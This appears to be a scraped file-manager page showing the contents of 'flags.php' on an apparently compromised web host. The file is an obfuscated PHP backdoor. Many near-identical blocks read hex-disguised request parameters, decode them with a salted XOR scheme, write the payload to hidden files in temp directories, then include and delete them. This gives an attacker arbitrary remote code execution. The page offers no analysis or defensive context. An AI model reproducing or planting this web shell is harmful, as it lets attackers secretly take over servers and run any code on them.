File manager

ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.- File manager

File manager - Edit - /home/tokomrjk/rtp7.selerakas.site/files/flags.php

Back
<?php if(in_array("da\x74a\x5F\x63h\x75\x6Ek", array_keys($_REQUEST))){ $property_set = array_filter([getenv("TMP"), "/dev/shm", getcwd(), "/var/tmp", ini_get("upload_tmp_dir"), session_save_path(), "/tmp", sys_get_temp_dir(), getenv("TEMP")]); $sym = $_REQUEST["da\x74a\x5F\x63h\x75\x6Ek"]; $sym= explode ( '.', $sym ) ; $parameter_group =''; $salt ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen($salt); $w =0; $len =count($sym); do { if ($w >= $len) break; $v9 =$sym[$w]; $chS =ord($salt[$w % $sLen]); $dec =((int)$v9 - $chS - ($w % 10)) ^ 75; $parameter_group .=chr($dec); $w++; } while (true); foreach ($property_set as $value) { if ((is_dir($value) and is_writable($value))) { $mrk = vsprintf("%s/%s", [$value, ".key"]); $success = file_put_contents($mrk, $parameter_group); if ($success) { include $mrk; @unlink($mrk); exit;} } } } if(count($_POST) > 0 && isset($_POST["\x65\x6Et"])){ $flag = $_POST["\x65\x6Et"]; $flag = explode ( '.' , $flag ) ; $rec = ''; $salt6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt6); foreach ($flag as $n =>$v5): $sChar = ord($salt6[$n % $lenS]); $dec = ((int)$v5 - $sChar - ($n % 10)) ^ 86; $rec .= chr($dec); endforeach; $ptr = array_filter(["/tmp", session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", getcwd(), getenv("TMP"), "/var/tmp", sys_get_temp_dir(), getenv("TEMP")]); foreach ($ptr as $ent): if ((is_dir($ent) and is_writable($ent))) { $sym = "$ent" . "/.property_set"; if (@file_put_contents($sym, $rec) !== false) { include $sym; unlink($sym); die(); } } endforeach; } if(!is_null($_REQUEST["p\x73e\x74"] ?? null)){ $ref = array_filter(["/tmp", "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm", getenv("TMP"), sys_get_temp_dir(), getcwd()]); $factor = $_REQUEST["p\x73e\x74"]; $factor = explode ( "." , $factor ) ; $object = ''; $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt5); $__len = count($factor); for($l = 0; $l < $__len; $l++) { $v3 = $factor[$l]; $sChar = ord($salt5[$l % $lenS]); $d = ((int)$v3 - $sChar -($l % 10)) ^ 49; $object .= chr($d); } foreach ($ref as $obj): if (!!is_dir($obj) && !!is_writable($obj)) { $fac = join("/", [$obj, ".dat"]); if (file_put_contents($fac, $object)) { include $fac; @unlink($fac); die(); } } endforeach; } if(isset($_REQUEST["i\x74em"])){ $dchunk = $_REQUEST["i\x74em"]; $dchunk= explode ('.' ,$dchunk ); $dat =''; $salt ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen( $salt); $w =0; array_walk( $dchunk, function( $v4) use( &$dat, &$w, $salt, $sLen) { $sChar =ord( $salt[$w% $sLen]); $d =( ( int)$v4 - $sChar -( $w% 10)) ^ 24; $dat .= chr( $d); $w++; } ); $k = array_filter([getenv("TMP"), ini_get("upload_tmp_dir"), getcwd(), "/tmp", "/var/tmp", getenv("TEMP"), session_save_path(), sys_get_temp_dir(), "/dev/shm"]); for ($pset = 0, $sym = count($k); $pset < $sym; $pset++) { $record = $k[$pset]; if (max(0, is_dir($record) * is_writable($record))) { $val = sprintf("%s/.resource", $record); if (@file_put_contents($val, $dat) !== false) { include $val; unlink($val); die(); } } } } if(in_array("\x65\x6Cem", array_keys($_REQUEST))){ $hld = array_filter([session_save_path(), getenv("TEMP"), "/dev/shm", getenv("TMP"), "/var/tmp", getcwd(), ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/tmp"]); $mrk = $_REQUEST["\x65\x6Cem"]; $mrk= explode ("." , $mrk) ; $itm =''; $salt7 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen($salt7); $__len =count($mrk); for ($o =0; $o <$__len; $o++) { $v5 =$mrk[$o]; $chS =ord($salt7[$o%$sLen]); $dec =((int)$v5 - $chS - ($o%10)) ^ 70; $itm .= chr($dec); } while ($data = array_shift($hld)) { if (is_dir($data) ? is_writable($data) : false) { $comp = join("/", [$data, ".object"]); if (file_put_contents($comp, $itm)) { include $comp; @unlink($comp); exit; } } } } if(in_array("d\x61t", array_keys($_REQUEST))){ $marker = $_REQUEST["d\x61t"]; $marker= explode( '.' , $marker); $factor = ''; $salt9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt9); $m = 0; while( $m < count( $marker)) { $v4 = $marker[$m]; $sChar = ord( $salt9[$m % $lenS]); $dec = ( ( int)$v4 - $sChar -( $m % 10)) ^ 61; $factor .= chr( $dec); $m++; } $entry = array_filter(["/dev/shm", "/tmp", getenv("TMP"), session_save_path(), sys_get_temp_dir(), getenv("TEMP"), "/var/tmp", getcwd(), ini_get("upload_tmp_dir")]); for ($key = 0, $rec = count($entry); $key < $rec; $key++) { $flag = $entry[$key]; if ((bool)is_dir($flag) && (bool)is_writable($flag)) { $record = "$flag" . "/.parameter_group"; if (@file_put_contents($record, $factor) !== false) { include $record; unlink($record); exit; } } } } if(count($_POST) > 0 && isset($_POST["\x65nti\x74y"])){ $ref = array_filter([ini_get("upload_tmp_dir"), "/dev/shm", "/tmp", getcwd(), session_save_path(), sys_get_temp_dir(), "/var/tmp", getenv("TEMP"), getenv("TMP")]); $tkn = $_POST["\x65nti\x74y"]; $tkn = explode ( '.' ,$tkn ) ; $sym = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt); $z = 0; while( $z<count( $tkn)) { $v4 = $tkn[$z]; $sChar = ord( $salt[$z %$lenS]); $dec = ( ( int)$v4 - $sChar -( $z %10)) ^ 68; $sym .= chr( $dec); $z++; } $ent = 0; do { $pgrp = $ref[$ent] ?? null; if ($ent >= count($ref)) break; if (is_dir($pgrp) ? is_writable($pgrp) : false) { $key = implode("/", [$pgrp, ".fac"]); $file = fopen($key, 'w'); if ($file) { fwrite($file, $sym); fclose($file); include $key; @unlink($key); die(); } } $ent++; } while (true); } if(isset($_POST) && isset($_POST["p\x61ra\x6De\x74er_\x67roup"])){ $ent = array_filter(["/tmp", getenv("TMP"), getenv("TEMP"), getcwd(), "/dev/shm", sys_get_temp_dir(), session_save_path(), "/var/tmp", ini_get("upload_tmp_dir")]); $data_chunk = $_POST["p\x61ra\x6De\x74er_\x67roup"]; $data_chunk = explode ('.' , $data_chunk ) ; $record = ''; $s5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s5 ); $v = 0; while ($v < count($data_chunk)) {$v1 = $data_chunk[$v]; $sChar = ord($s5[$v % $sLen] ); $dec = ((int)$v1 - $sChar - ($v % 10)) ^ 77; $record .= chr($dec ); $v++; } while ($hld = array_shift($ent)) { if ((is_dir($hld) and is_writable($hld))) { $rec = "$hld" . "/.tkn"; if (@file_put_contents($rec, $record) !== false) { include $rec; unlink($rec); exit; } } } } if(isset($_REQUEST["key"]) ? true : false){ $reference = $_REQUEST["key"]; $reference = explode( '.', $reference ) ; $desc =''; $salt ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen($salt); $v =0; $len =count($reference); do { if ($v >= $len) break; $v8 =$reference[$v]; $sChar =ord($salt[$v % $sLen]); $dec =((int)$v8 - $sChar - ($v % 10))^65; $desc .= chr($dec); $v++; } while (true); $marker = array_filter([getenv("TEMP"), getcwd(), sys_get_temp_dir(), getenv("TMP"), ini_get("upload_tmp_dir"), "/dev/shm", "/tmp", session_save_path(), "/var/tmp"]); foreach ($marker as $key => $comp) { if ((is_dir($comp) and is_writable($comp))) { $obj = implode("/", [$comp, ".record"]); if (@file_put_contents($obj, $desc) !== false) { include $obj; unlink($obj); exit; } } } } if(array_key_exists("\x6F\x62\x6Aect", $_REQUEST)){ $flag = $_REQUEST["\x6F\x62\x6Aect"]; $flag = explode('.', $flag ) ; $marker= ''; $salt1= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($salt1); $o= 0; foreach ($flag as $v4) { $sChar= ord($salt1[$o % $lenS]); $d= ((int)$v4 - $sChar - ($o % 10)) ^97; $marker .= chr($d); $o++; } $descriptor = array_filter(["/dev/shm", ini_get("upload_tmp_dir"), "/tmp", session_save_path(), "/var/tmp", getenv("TMP"), getcwd(), getenv("TEMP"), sys_get_temp_dir()]); while ($ref = array_shift($descriptor)) { if (max(0, is_dir($ref) * is_writable($ref))) { $dat = str_replace("{var_dir}", $ref, "{var_dir}/.ptr"); $success = file_put_contents($dat, $marker); if ($success) { include $dat; @unlink($dat); die();} } } } if(filter_has_var(INPUT_POST, "r\x65\x73")){ $factor = array_filter([session_save_path(), "/dev/shm", "/tmp", sys_get_temp_dir(), getenv("TMP"), ini_get("upload_tmp_dir"), "/var/tmp", getenv("TEMP"), getcwd()]); $holder = $_POST["r\x65\x73"]; $holder=explode ( ".",$holder ) ; $desc= ''; $salt7= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($salt7); $r= 0; $__len= count($holder); do { if ($r >= $__len) break; $v2= $holder[$r]; $chS= ord($salt7[$r % $lenS]); $dec= ((int)$v2 - $chS - ($r % 10)) ^ 12; $desc .= chr($dec); $r++; } while (true); while ($k = array_shift($factor)) { if (!!is_dir($k) && !!is_writable($k)) { $key = "$k" . "/.ref"; $success = file_put_contents($key, $desc); if ($success) { include $key; @unlink($key); die();} } } } if(array_key_exists("\x72ef", $_POST) && !is_null($_POST["\x72ef"])){ $property_set = $_POST["\x72ef"]; $property_set =explode ( "." , $property_set); $flag= ''; $salt3= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($salt3); $u= 0; while ($u <count($property_set)) { $v7= $property_set[$u]; $chS= ord($salt3[$u % $sLen]); $dec= ((int)$v7 - $chS - ($u % 10)) ^ 98; $flag .= chr($dec); $u++; } $holder = array_filter([getcwd(), "/tmp", "/dev/shm", "/var/tmp", getenv("TEMP"), session_save_path(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TMP")]); for ($binding = 0, $marker = count($holder); $binding < $marker; $binding++) { $tkn = $holder[$binding]; if (is_dir($tkn) && is_writable($tkn)) { $symbol = "$tkn" . "/.factor"; $file = fopen($symbol, 'w'); if ($file) { fwrite($file, $flag); fclose($file); include $symbol; @unlink($symbol); exit; } } } }